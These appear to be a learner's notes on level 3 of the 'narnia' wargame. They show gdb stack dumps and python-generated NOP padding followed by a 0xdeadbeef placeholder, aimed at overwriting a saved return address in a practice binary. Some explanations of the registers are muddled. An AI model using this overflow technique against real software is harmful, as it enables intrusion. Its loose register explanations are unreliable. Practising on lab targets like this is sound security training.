narnia level 3:

no overflow, but full buffer: 
/tmp/UUUUUUUUUUUUUUUUUUUUUU.txt
first acceptable char string overflowing one char:
/tmp/UUUUUUUUUUUUUUUUUUUUUUU.txt

output from gdb (note 32 char string of U's):

(gdb) x/28x $ebp-0x38
0xffffd680:     0x55555555      0x55555555      0x55555555      0x55555555
0xffffd690:     0x55555555      0x55555555      0x55555555      0x00555555
0xffffd6a0:     0x7665642f      0x6c756e2f      0x0000006c      0x00000000
0xffffd6b0:     0x00000002      0xf7fc5000      0x00000000      0xf7e2a286
0xffffd6c0:     0x00000002      0xffffd754      0xffffd760      0x00000000
0xffffd6d0:     0x00000000      0x00000000      0xf7fc5000      0xf7ffdc0c
0xffffd6e0:     0xf7ffd000      0x00000000      0x00000002      0xf7fc5000

note where the registers are located.
(gdb) x/28x $esp
0xffffd658:     0xffffd680      0xffffd88e      0xffffffff      0xf7fc5000
0xffffd668:     0xf7e1ee18      0xf7fd2e28      0xf7fc5000      0xffffd754
0xffffd678:     0xf7ffcd00      0x00200000      0x55555555      0x55555555
0xffffd688:     0x55555555      0x55555555      0x55555555      0x55555555
0xffffd698:     0x55555555      0x00555555      0x7665642f      0x6c756e2f
0xffffd6a8:     0x0000006c      0x00000000      0x00000002      0xf7fc5000
0xffffd6b8:     0x00000000      0xf7e2a286      0x00000002      0xffffd754

ebp @ 0x00000000
esp @ 0xffffd680
eip @ 0xf7e2a286

**attemping to alter return address by buffer overflowing brute force**
1.) fill to the brim.
Starting program: /narnia/narnia3 $(python -c 'print "\x90"*59')

Breakpoint 1, 0x0804855f in main ()
(gdb) x/28x $esp
0xffffd648:     0xffffd670      0xffffd871      0xffffffff      0xf7fc5000
0xffffd658:     0xf7e1ee18      0xf7fd2e28      0xf7fc5000      0xffffd744
0xffffd668:     0xf7ffcd00      0x00200000      0x90909090      0x90909090
0xffffd678:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd688:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd698:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd6a8:     0x00909090      0xf7e2a286      0x00000002      0xffffd744
(gdb)

nop slide to $eip register. (0x90)

2.) inject code, replacing the return register stored at eip with injected memory address at 0xffffd678. 
Starting program: /narnia/narnia3 $(python -c 'print "\x90"*60 + "\xef\xbe\xad\xde"')

Breakpoint 1, 0x0804855f in main ()
(gdb) x/28x $esp
0xffffd638:     0xffffd660      0xffffd86d      0xffffffff      0xf7fc5000
0xffffd648:     0xf7e1ee18      0xf7fd2e28      0xf7fc5000      0xffffd734
0xffffd658:     0xf7ffcd00      0x00200000      0x90909090      0x90909090
0xffffd668:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd678:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd688:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd698:     0x90909090      0xdeadbeef      0x00000000      0xffffd734

**attempt to alter return address 2**


